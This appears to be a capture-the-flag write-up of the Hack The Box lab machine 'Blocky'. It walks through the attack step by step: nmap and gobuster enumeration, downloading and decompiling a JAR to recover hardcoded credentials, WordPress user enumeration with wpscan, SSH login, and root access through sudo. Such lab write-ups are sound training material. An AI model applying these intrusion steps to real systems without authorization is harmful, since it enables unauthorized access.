Writeup - Blocky HTB

"Blocky" is one of the easiest Linux Machines from HTB. To solve this vulnerable machine the enumeration is the key. As well it was necessary to unpack and disassemble a .jar file.

1.- Initial Service Enumeration - Nmap Scan

As the first step, I will check the list of exposed services. To understand the type of attack I can execute, it is mandatory to know what services the target is running.

For this I will use nmap

note (blocky.htb was added to /etc/hosts)

sudo nmap blocky.htb -Pn -n -T4 -sC -sV -O  -oA fullScan
Option Description
-Pn Treat all hosts as online. Skip host discovery
-n Never does DNS resolution
-T4 Scan speed
-sC Script Scan
-sV determine service/version info
-O OS detection
-oA Output filename

View more nmap options

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-25 23:49 EST
Nmap scan report for blocky.htb (
Host is up (0.081s latency).
Not shown: 996 filtered ports
21/tcp   open   ftp     ProFTPD 1.3.5a
22/tcp   open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp   open   http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos

I noticed that there is a vulnerability for FTP ProFTPD 1.3.5 but after many attempts, it was not exploited correctly, so I moved to more enumeration

I executed Gobuster to search directories:

gobuster dir -u http://blocky.htb -w /home/daronwolff/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt

More information from Gobuster here in this post

2.- Looking for information disclosure in Website

Gobuster reported an interesting directory: /plugins

Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:            http://blocky.htb
[+] Threads:        10
[+] Wordlist:       /home/daronwolff/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2021/01/26 00:02:52 Starting gobuster
/wiki (Status: 301)
/wp-content (Status: 301) 
/plugins (Status: 301) <---------------THIS IS INTERESTING------------
/wp-includes (Status: 301)
/javascript (Status: 301)
/wp-admin (Status: 301)
/phpmyadmin (Status: 301)

This directory revealed a couple of files

3.- Analyzing information

Then I downloaded the files for a deep inspection

wget http://blocky.htb/plugins/files/BlockyCore.jar 
wget http://blocky.htb/plugins/files/griefprevention-1.11.2-

Then I unpacked the contend of BlockyCore.jar. More info here

jar -xf BlockyCore.jar 

It generated 2 directories. COM and META-INF

I used a online service to decompile the BlockyCode.class

Note, as well it is possible to disassemble the Java class using javap command. More info here

The result displayed a username and password

After some extra enumerations I found the username notch in the Wordpress blog

This was also confirmed by wpscan

wpscan --url http://blocky.htb -e u

---url url of wordpress blog to scan
-e = u is used to enumarate users

4.- Connecting to the server via SSH

I got a username and a password (from decompiled JAR) and the SSH service was available, so I tried to get a SSH connection

ssh [email protected]

5.- Privilege escalation

After some basic enumeration I noticed notch belongs to the sudo group

To become root I just typed

sudo su
root@Blocky:/home/notch# whoami 
root@Blocky:/home/notch# id
uid=0(root) gid=0(root) groups=0(root)

And that´s it. Super easy machine